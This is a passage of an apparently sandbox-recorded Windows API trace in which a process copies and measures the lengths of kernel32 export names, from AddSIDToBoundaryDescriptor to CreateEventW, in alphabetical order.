lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0085.826] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0085.826] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0085.826] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0085.826] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0085.826] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0085.826] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0085.826] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0085.826] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0085.826] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0085.827] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0085.827] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0085.827] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0085.827] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0085.827] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0085.827] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0085.827] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0085.827] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0085.827] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0085.827] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0085.827] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0085.827] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0085.827] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0085.827] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0085.827] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0085.827] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0085.827] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0085.827] lstrlenA (lpString="BACKUPREAD") returned 10 [0085.827] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0085.827] lstrlenA (lpString="BACKUPSEEK") returned 10 [0085.827] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0085.827] lstrlenA (lpString="BACKUPWRITE") returned 11 [0085.827] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0085.827] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0085.827] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0085.827] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0085.827] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0085.827] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0085.827] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0085.827] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0085.827] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0085.829] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0085.829] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0085.829] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0085.829] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0085.829] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0085.829] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0085.829] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0085.829] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0085.829] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0085.829] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0085.829] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0085.829] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0085.829] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0085.829] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0085.829] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0085.829] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0085.829] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0085.829] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0085.829] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0085.829] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0085.829] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0085.829] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0085.829] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0085.829] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0085.829] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0085.829] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0085.829] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0085.829] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0085.829] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0085.829] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0085.829] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0085.829] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0085.829] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0085.830] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0085.830] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0085.830] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0085.830] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0085.830] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0085.830] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0085.830] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0085.830] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0085.830] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0085.830] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0085.830] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0085.830] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0085.830] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0085.830] lstrlenA (lpString="BEEP") returned 4 [0085.830] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0085.830] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0085.830] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0085.830] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0085.830] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0085.830] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0085.830] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0085.830] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0085.830] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0085.830] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0085.830] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0085.830] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0085.830] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0085.830] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0085.830] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0085.830] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0085.830] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0085.830] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0085.830] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0085.830] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0085.830] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0085.830] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0085.831] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0085.831] lstrlenA (lpString="CANCELIO") returned 8 [0085.831] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0085.831] lstrlenA (lpString="CANCELIOEX") returned 10 [0085.831] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0085.831] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0085.831] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0085.831] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0085.831] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0085.831] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0085.831] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0085.831] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0085.831] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0085.831] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0085.831] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0085.831] lstrlenA (lpString="CHECKELEVATION") returned 14 [0085.831] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0085.831] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0085.831] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0085.831] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0085.831] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0085.831] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0085.831] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0085.831] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0085.831] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0085.831] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0085.831] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0085.831] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0085.831] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0085.831] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0085.831] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0085.831] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0085.831] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0085.831] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0085.831] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0085.831] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0085.831] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0085.832] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0085.832] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0085.832] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0085.832] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0085.832] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0085.832] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0085.832] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0085.832] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0085.832] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0085.832] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0085.832] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0085.832] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0085.832] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0085.832] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0085.832] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0085.832] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0085.832] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0085.832] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0085.832] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0085.832] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0085.832] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0085.832] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0085.832] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0085.832] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0085.832] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0085.832] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0085.832] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0085.832] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0085.832] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0085.832] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0085.832] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0085.832] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0085.832] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0085.832] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0085.832] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0085.833] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0085.833] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0085.833] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0085.833] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0085.833] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0085.833] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0085.833] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0085.833] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0085.833] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0085.833] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0085.833] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0085.833] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0085.833] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0085.833] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0085.833] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0085.833] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0085.833] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0085.833] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0085.833] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0085.833] lstrlenA (lpString="COPYCONTEXT") returned 11 [0085.833] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0085.833] lstrlenA (lpString="COPYFILEA") returned 9 [0085.833] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0085.833] lstrlenA (lpString="COPYFILEEXA") returned 11 [0085.833] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0085.833] lstrlenA (lpString="COPYFILEEXW") returned 11 [0085.833] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0085.833] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0085.833] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0085.833] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0085.833] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0085.833] lstrlenA (lpString="COPYFILEW") returned 9 [0085.833] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0085.833] lstrlenA (lpString="COPYLZFILE") returned 10 [0085.833] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0085.834] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0085.834] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0085.834] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0085.834] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0085.834] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0085.834] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0085.834] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0085.834] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0085.834] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0085.834] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0085.834] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0085.834] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0085.834] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0085.834] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0085.834] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0085.834] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0085.834] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0085.834] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0085.834] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0085.834] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0085.834] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0085.834] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0085.834] lstrlenA (lpString="CREATEEVENTA") returned 12 [0085.834] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0085.834] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0085.834] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0085.834] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0085.834] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0085.834] lstrlenA 